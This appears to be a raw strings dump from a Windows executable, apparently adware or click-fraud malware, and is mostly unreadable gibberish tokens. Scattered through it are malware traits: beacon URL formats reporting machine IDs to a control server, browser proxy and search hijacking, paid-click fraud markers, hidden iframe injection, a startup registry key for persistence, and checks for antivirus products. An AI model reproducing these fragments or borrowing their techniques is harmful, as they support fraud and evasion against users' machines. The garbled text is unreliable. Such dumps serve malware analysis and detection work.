fn|RAaUBlQm|TWZSlR|DLHPW|GMBlYQHn|GceINK|IZkfLgUS|X_bS_iWf|TPU6E|KbNCVaWD|TbkePJJ|JOjc8gYNZ|PUbkOfcdF|G6NIOPUZ|THVeKWd|9JZdea_|9YVLoOQd|VWbjRO|GAMcEO IXi|GXhMUVB|JMLStcN|UVFZidh oe|S_RWLD|CTHFQlnO|HiXiR8J|LaWoh6|VULYQcV|XS_PhB|ID8ObM|GfdPDn|JceTNU|MSkSKc|WLoOdfZOUT|XMX4MaVPM|aaXFeZSd8J|OdgnXJ|XnZVMg|ZdWgfVY|LEMLMVN|ccGHhEc|ZJIVIWj|XOdgDcX hkTZWbXVDD|IMJMFr|aDPZW_b|HFZOk|hTRQfUcZ|aVoOcfe|MLHGaSS|MciKRSMV|bKUYKfocN|adTlQa|bfiSVhB|OMTWa|NFfaDUZP|dVPFNRWl|aAkQCic|bVoWgXb|NL4PWRBTZ|bLFhSqZ9J|TOaedNUhS|g_RZU|_bhhJQ|FCOKSBg|cHXhSejES|UKkeiI|cYZicQb|ebZjREHP|LWVWBmS|RPdMUVB|TdYbnPHUc|PVYUbfe|cPhBIGL|XEYJf|eD_ZP Uh|LJYOOZhEc|eLVgYn|gbagjFO|HPIREJh|eUHcEiZJ|UYOZkgAS|eRcZSZgSa|dhP-E2LaLJOZ|eURfIUZ6|UYUfZPN|egOn_cZo|clfZELMK|ZINFldQ|UVUlZL|WOKhiPPgUX|lUhfWeRPb|SR38eMO|TZgRTkIc|iESLWhXb|OYcGoXQZi|fgfRUW6PI|WUSibHFjSc|iQReIWj|gUbbEncUb|jlahYSRAB|aENJ_aX|WVKiVPTS|ZSmiEc|iHicQp_aS|heGU2LQP|UPjQPDn|XiZ8TY|aOhhNUm|VZQiZVf|iThNRP|TQFSBgnFLd|ZfbIFd Ie|rcHiQRZZ|lVcZPijSLF QZ|aFOcSDO|pEeRBQLc|mXbPQS|ZZXcei_|mTiURJCaMD|_ZiLD|pMST|VN_Neka6m|oOX_g|pfTePd|_RNGZEY|_seUHnE|hkESHVee_ DnTRiOXbfeWSV|JVGRZIUJhdLQ|hETVLWHebhT OdTIoY|eZfUZXjBbGLM LZEldFKbSiZ9J|UOTaSEeYNZ|MaSWaRPpPO6|JMZPOigJHiXiVH GW|KgdXJnaEmegRVWb_ SQ|I6VWJFOVTLQV|TjVQIVVVaSNYcE|lMbZgeW_|TMREGXVBNccH|GZWlbBNYG_|ahKgYCiiYS|VbaTfFbAJ|aVJIZmaSYIeZ9cS|SSoPHQbIhQ|SReRSgRSW2L|PbESimabZRW|RITdOQe_HYc AhP SbSih_RODLC|QVCFmQUWRR Zo9WVIVhcNdiHcMoZVS|achFW9G_XFSicH Ef|XiZIJ_NblfEb QNY djbXO_TjIRP8gSMF|XaDUZXZhKReIWj|QQheIl_cV|WeUcjBPALM XBSngDWV, GSWBJPTS|rTNQeAgUa|lWeOdRNLD|AMPFDimLE|TMkRHTWXOi WUTgOWcdc_RS|hREDD8NMM|UVTDORJ_b|8NWXbb_KmQCcZ|TVjZbfRUD5GVI|DMibLSYIeV|8QVTW_XJU|SHf_gjZOZXUPQ6|JIQJWoTLQV|c_UK_aJWjT|8QgVZPYbfZ|RibP_6RQRF|NchRShSjjKQ|KGaXnKa|eRZPcZjbaT|UJY2JXVPFr|THVeKWiPWLR|SpWEcnL ZdihSRWcb|UU2XWHPOZ|VOXTSeRVTSK|iX_OQgTVZ|kRcfOfjBQ|9WLVPDbaRUeXZZ6dPJS|ZTBQTRiiYb|mSa_RGDPGVI|WFhaDIRa_dA|FTOgnXLinLcZU|iWZSVZMLFC|MWUSVTLRb|VSbKbPLSjT|LYgOrUSRd|ZShhPbGJM|QFUldQLUEqeHJ|_G_oiHdhIh|_VbfkORZO|bANZETJYdQH|cIkWKWTOa Yd|CaYPckYUW|UZmSVUABM(KMJWUQFbEdZ9J)|TKgbcNbYN|nQgRqbfXd|MRK8ZXBO|bnGUeGZbKWVZVePVYTE|mfbRkeWdjBQ|DMXISBgYGH|fVffNFUUZk_|EcTOgQiYSQWb|ZTRKMZFJEZ TLQZXiRPJ|JKcdPHUmIh|eUhTWaPWJQ6|DbVPTZbLGV|PWlKKSUkXREc|kAlPUdSTW_|VTFARIPPQlQP|DjSil6X_Ggeb|HYiHcfb|cWgbdhPOGJ|JIOBtUSUZP|ScHTKOcebA|hYLYQcRXWZ RZUU2RM|JMVpd_DcMeV|PMPUeeS6oYNZ|SaZgWmXUF|P6RNSSNcc|ORlEjj6YPT|_alEaUTcZU YpRecTIOGPQHF, FmbROeP Zo9WVIVhcNYTE|aXnSleWSV(HOA9MRDMVbLGV)|LpUNTJNZkfKiXIVkYUW|cePpPVAL|UIMPrYFDc|MTkLWVLSj|b6aYDciYT SQWS|XBE2NMRUJh|UVRcIgh6dVRS|gTPdSOhMoecS|gPcP_ADMR|BNfdGLfMeV|8JMJWjXN|bUTb_miSZSb|dPULPQTUZfYQH|TLceNdVcOvcJU|eAl_mVkWaT|fBUGVMXJOZ|SaShSZVLYHJWjT|8adPcPdXiSZ|aVGHF8UMD BXYG|UVTSXHNUORa|RKcZUaMiVV SfhhPJ6L_ YTQ|ibHShEqeHJ|HSceREaaIh|agegOahYFOALM|JJOVhWHhMVV|BNUGfpTNYTE|jMcjfcePpPO6|NPIOBtdSahMVZJJ|TOepPVQeIhQ|gegWaXhPO6|KMXIPngH_RXW|hEXWKeeSKcU|MZeXeUOeQRNRD|ObIUJVeLQV|HfnAUPT|_kbPUaUeMhj|SgbaeYHLGVI|JWZgPHTX_d|PJ_XOZm8aYNZ|MbRegOSZOH|LFfVPYccH|RiIcj6RPaWn|R6gRAgMoVgWaT|XBWADTSYBXYQ|FYPfhLWVSOvXJU|YMcagRdWaT|jPSAPIQBUZ|VHQeJ_SNF_K|iX_6SnCf_kZi|cSbZDLDJQR W|NZRHQUEqeHJ|ZOZ_TJQVIf OYjiOgT|iJO5CVEGJf SLWhEkV|9TddQuRHYcE|VXRkkSecb (TDD9bXBNia)|GLTPfWASHI fkSEjb|BoagegWbb|eSOAQaEU|UcoDQZH_dA|WHTWpX9YcE|nQWRjSecU|MLKGVSQSca|KFjc|WpAYPSWYT|7YdSiagecbZ|WoEUGAPPPSiiKLRc_UA|FfOgdfKbnCcZ|hZdiOgjBWAL|WREBhhHWhSe|R8cJRbrXN|daAhkQf_aS| facebook. __fastcall Fast decoding Code from Chris Anderson February file error FindClose FindFirstFileA FindFirstFileExA FindNextFileA FindResourceA flickr FlsAlloc FlsFree FlsGetValue FlsSetValue FlushFileBuffers " frameborder="no" scrolling="auto" style="margin:0 0 0 0; padding:0 0 0 0;" height="100%" width="100%" ></iframe> freeaddrinfo FreeEnvironmentStringsW FreeLibrary Friday ftg65 hji2;3_sscxo4562235df[a,gdd9sf \gb_%d.bat <gcQXU><![mpb0r[jgg]]></jeFLU> /gen_204 Genuu8 GetACP GetActiveWindow getaddrinfo GetCommandLineA GetConsoleCP GetConsoleMode GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDiskFreeSpaceExA GetEnvironmentStringsW GetEnvironmentVariableA GetExitCodeProcess GetFileAttributesA GetFileSize GetFileType GetLastActivePopup GetLastError GetModuleFileNameA GetModuleFileNameW GetModuleHandleW GetOEMCP GetProcAddress GetProcessHeap GetProcessWindowStation GetStartupInfoW GetStdHandle GetStringTypeW GetSystemDefaultLangID GetSystemDirectoryA GetSystemTime GetSystemTimeAsFileTime GetTempFileNameA GetTempPathA GetTickCount GetUserObjectInformationW GetVersionExA GetVolumeInformationA <gf8YPSSkiP><![12jNv[rw]]></gcQhZNHGSa> .ggpht. Gh9Ghr gKZEtzy GlobalFree .google google. google_ad.line1 google_ad.title google_ad.url google-analytics. google.com googlesyndication. googleusercontent. gstatic. <gUF><![6yzJ1[Vghf://NH88NPPWZg.FRc/?U=%j]]></hAK> `h```` H*0"ZOW H8;H0v \$H9\$$t </HEAD> <HEAD> header crc mismatch HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSetInformation HeapSize <HFTXg><![op061[dQQS]]></JSoRN> `h`hhh HH:mm:ss HHtXHHt HHtYHHt Host: %s </HTML> <HTML> http:// HTTP/1.0 HTTP/1.0 200 OK HTTP/1.1 200 OK HTTP/1.1 302 Found http=127.0.0.1: HTTP/1.x http%3A%2F%2F http://antimouseclub.com http://bignotebookshop.com http://crazyleafdesign.com/blog/images/share/facebook.png http://crazyleafdesign.com/blog/images/share/stumble.png http://%d.ctrl.%s http://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg http://freeharddrivesoft.com http://freemobilesoftonline.com http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1 http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2 http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup250.gif http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif http://happyaladdin.com http://healthylifenow.com/templates/7348/images/header_logo.jpg http://healthylifenow.com/templates/7349/images/header_logo.jpg http://hollandandbarrett.com/images/footer/account.gif http://hollandandbarrett.com/images/footer/account.jpg http://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif http://japanesegreenteaonline.com/assets/images/greentea-cha-2.gif http://lostpropaganda.net/blog/pics/3321.jpg http://lostpropaganda.net/blog/pics/3322.jpg http://monochrom.at/polytheism/pictures/TanzenderShiva.jpg http://nationsautoelectric.com/images/50-217-1_F_1_.jpg http://nationsautoelectric.com/images/50-217-1_F_2_.jpg http://onlinebizdirectory.com/images/PowerHideBanner.gif http://onlinebizdirectory.com/images/PowerShowBanner.gif http://onlinedatingsecretfriends.com/images/im133.jpg http://onlinedatingsecretfriends.com/images/im134.jpg http://onlineinstitute.com/g7/images/logo2.jpg http://onlineinstitute.com/g7/images/logo3.jpg http://onlineinstitute.com/g7/images/logo4.jpg http://onlineinstitute.com/g7/images/logo.jpg http://ordersmallcd.com http://pdasoftstorage.com http://psfk.com/img/icons/facebook.png http://psfk.com/img/icons/twitter.png http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif https:// http://searchinpeoplelist.com HTTP server http://smallcatsanddog.com http://supportminidevices.com http://www.google.com http://www.google.com/ http://www.yahoo.com/ http://zonetf.com/index.html hwid=%s&id=%s h|YXkf://Sac.SbiaEUhDiNjdeWSg.TPP/?F8aW=w34lypThEZ_c1P5y9F7rudvjC3rj9_kXnh|PXUQ://qlZ.dyZ_hCNUYSt.RKb/?cAnd=BJ1j91TezAbfyKsoBLgmya0Q0sjjHYf|XiTj://hlm.VORSZFV2LLHBSfYQJi.Gfc/?JF_Y=9PySB2Cy8Yup8X6qvMjY2NkVG1gZBN1kro|OZgl://kSl.TOgjlZXSf_kU.FGK/?VEUT=GImZCqUusNkd8f6UAZrs6Z0l9zsmvMbS3n|IUne://ZZm.egROXMUeX_HhYTZd.Sed/?aOhi=w5bU3qDeHYgaBN9pqOye8fyQB1dq6Z0l9x|jZSJAL_|WMVnh|KHdXSZ|LTYT|fal|OSXOiXWZiZ|gTVO V6V|PESEXdUH|RRSb|PN_Y|Oog|6TjLn|MbRkShf|ROLEC _IY|CVRHV|SHjc|7QVbXkQ|8jbSb_i|SfbPg|WFWAQP|JJTnYQJ|XEp fKWU|RSoQEQc|MVdikiPOh|iIHE8TI|TP_iFRhI|Xk8P|OUg cXNa|XOn Ndo| id=%s&c=%d id=%s&hwid=%s id=%s&hwid=%s&c=%d&ver=71 id=%s&hwid=%s&step=1&wd=%d&av=%s id=%s&type=%d&ppcid=%s ?If90t if exist "%s" goto a <iframe </iframe <iframe src=" IiGM>nw /images /imglanding incompatible version incorrect data check incorrect header check incorrect length check ineIu( inflate 1.2.5 Copyright 1995-2010 Mark Adler InitializeCriticalSection InitializeCriticalSectionAndSpinCount INST_IE insufficient memory InterlockedDecrement InterlockedExchange InterlockedIncrement \Internet Explorer InternetQueryOptionA InternetSetOptionA invalid bit length repeat invalid block type invalid code lengths set invalid code -- missing end-of-block invalid distance code invalid distances set invalid distance too far back invalid literal/length code invalid literal/lengths set invalid stored block lengths invalid string position invalid window size <IOR><![81fIz[i.u]]></NYU> IsDebuggerPresent IsProcessorFeaturePresent IsValidCodePage .ivwbox. January -java- javascript jdX9D$4v <jhc><![z0yJk[%V]]></MPT> j@j ^V kasper Keep-Alive KERNEL32.DLL [-k] keep attributes (don't turn off archive) &lang= _LAST_TIME_FAIL_CONNECT_MAIN_SERVER l!;b F LCMapStringW LeaveCriticalSection list<T> too long [-&LMb#{' LoadLibraryA LoadLibraryW LoadResource `local static guard' `local static thread guard' `local vftable' `local vftable constructor closure' Location Location: %s LockResource LSSRCHE LSSRCHTP1 lstrcatA lstrcmpA lstrcmpiA lstrcpyA lstrlenA lstrlenW `managed vector constructor iterator' `managed vector copy constructor iterator' `managed vector destructor iterator' mapq.st .mapquestapi. MapViewOfFile mcafee McAfee* mcagent.exe MessageBoxW <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> .microsoft. \Microsoft mj>zjZ MM/dd/yy Monday Mozilla msdownload msn.com MultiByteToWideChar N09F0u need dictionary "network.proxy.http" "network.proxy.http_port" "network.proxy.type" new[] norton Norton* November _NTDRIVE ntelu0 _NTROOT (null) octet-stream October Oh;O\sQ O@;H s O@;H(s ole32.dll OLEAUT32.dll `omni callsig' OpenEventA OpenMutexA .opera. operaprefs.ini operator [-o place-root-subdir] alternate project subdirectory OZw3(? PARAM_PROXY_PORT_NUMBER __pascal PathIsDirectoryA PING_LS_TM `placement delete closure' `placement delete[] closure' POST http://%s%s HTTP/1.1 POST %s HTTP/1.1 PPC_CLICK [-p place-file] PPPPPPPP Pragma: no-cache prefetch prefs.js Process32First Process32Next %PROGRAMFILES% %PROGRAMFILES(X86)% [Proxy] Proxy-Connection PRX_PRM __ptr64 PulseEvent PVVVVVV PWhD`C Qkkbal QQSVW3 QQSVWd [-q] suppress writing to log file %BINPLACE_LOG% ?query= &query= QueryDosDeviceA QueryPerformanceCounter " r8;r0v^ RaiseException RASAPI32.dll RasEnumConnectionsA <RbBVK><![jun3k[w]]></SODiW> rc=application error return code, `.rdata ReadFile realaudio referer Referer &referer=%s .referrer RegCloseKey RegDeleteValueA RegEnumKeyExA RegFlushKey RegOpenKeyExA RegQueryValueExA RegSetValueExA ReleaseMutex __restrict ResumeThread <Rka6Yc><![l7vI0[ehZ_]]></UPP2GV> r.msn.com [-r place-root] RSj0h`sC RSPhhaC RSSSSSSh8sC RtlUnwind %s_0%d_%d %s_0_%d_%s %s_1_%d_%s %s_1_%s %s_2_%d_%s %s_2_%s %s_3_%d_%s %s_3_%s %s:443/?ver=71&id=%s&hwid=%s&search=%s %s_4_%d_%s %s_5_%s Saturday `scalar deleting destructor' scorecardresearch.com script <script </script %s_%d_%d %s_%d_%d_%d %s_%d_%d_%d_%d %s_%d_%s search.aol. searcht2.aol. search.yahoo.com/search SELECT_RESERV_SRV_%d SEL_SERV SEND_INSTALL_REPORT SEND_INSTALL_REPORT_TM September ServiceName SetEnvironmentVariableA SetEvent SetFileAttributesA SetFilePointer SetHandleCount SetLastError SetStdHandle SetThreadPriority SetUnhandledExceptionFilter SHELL32.dll SHGetFolderPathA SHGetSpecialFolderPathA ;Sh`jC SHLWAPI.dll SizeofResource Software\Microsoft\Internet Explorer Software\Microsoft\Windows\CurrentVersion\Run SOFTWARE\Microsoft\Windows Defender Software\Microsoft\Windows NT\CurrentVersion\NetworkCards %s: %s %s%s_1 %s|%s|%d %s_%s_%d %s %s %s %s_%s_%s %s(%s, %s); ^SSSSS %s start%s%c%s %s/%s?v%d=%d&tq=%s [-s Symbol file path] split symbols from image files start= start=0 __stdcall stor.cfg %s?tq=%s stream end stream error `string' string too long StrStrA StrStrIA StrStrNW suche.aol. Sunday %s up%s %s?v%d=%d&tq=%s SVWj8h Symantec* SystemFunction036 SystemTimeToFileTime .tacoda. TerminateProcess text/html <TgTDN_Y><![z9yyz[q_]]></jaSY_gf> .thawte. +t HHt __thiscall !This program cannot be run in DOS mode. t>h@uC Thursday t<h@YC TIME_SWITCH t=ip&hrs=%d&q=&s=1 tISh rC </TITLE> <TITLE> TITLE_CLICK < tK< tG .tlowdb. TlsAlloc TlsFree TlsGetValue TlsSetValue too many length or distance symbols tR99u2 Transfer-Encoding Transfer-Encoding: t*=RCC .truveo. TryEnterCriticalSection t=%s&hrs=%d&q=&s=%d t=%s&hrs=%d&q=%s&s=%d t"SS9] u t=st&q=%s <+t"<-t [-t] test mode t=t&hrs=%d&q=id=1000&ver=%s&s=%d ;t$$t V t$<"u 3 Tuesday ;t$,v- twitter. &type=%d Type Descriptor' `typeof' type=%s&system=%s&id=%s&status=%s u59\$$t/9 u&9\$du u/9\$Tu `udt returning' uGSWWj uISPSj __unaligned uncheck =='undefined'?'%s':'%s' UnhandledExceptionFilter unknown Unknown unknown compression method Unknown exception unknown header flags set UnmapViewOfFile uNSSSSj UQPXY]Y[ URPQQh usage: binplace [switches] image-names... Use HTTP USER32.dll User-Agent User-Agent: mozilla/2.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) &useragent=%s user_pref uTVWh? %u.%u.%u.%u <UVWlbP> u~WSWj u;WVVVV `vbase destructor' `vbtable' `vcall' `vector constructor iterator' `vector copy constructor iterator' `vector deleting destructor' `vector destructor iterator' vector<T> too long `vector vbase constructor iterator' `vector vbase copy constructor iterator' Version <VFGgUWKeH><![33f7q[h]]></eaUIUiHiP> `vftable' </VFToaW> `virtual displacement map' .virtualearth. v N+D$ [-v] verbose output VWhP_C VWWWWh V_:X1: W9\$@t? WaitForSingleObject Wednesday where: [-?] display this message WideCharToMultiByte wikimedia. wikipedia. \Windows NT WinHttpCloseHandle WinHttpConnect WINHTTP.dll WinHttpOpen WinHttpOpenRequest WinHttpQueryDataAvailable WinHttpReadData WinHttpReceiveResponse WinHttpSendRequest WININET.dll _Wjd_W wkPSQR w+OQvr WriteConsoleW WriteFile WS2_32.dll WSASocketA .wsod. wsprintfA WVVVh,`C www.www.ru WWWWWWV \x26#39; \x26amp; \x26gt; \x26lt; \x26quot; \$X9\$0t' <xframe </xframe <xpplet </xpplet xppwpp xpxxxx yahoo. yahoo.com .yimg.com youtube. .ypcdn. <YPZZa><![0izIj[JcUc_h_ CWGHJ mWV qPiTFDj %H%V .]]></jEYSK> ytimg. )\ZEo^m/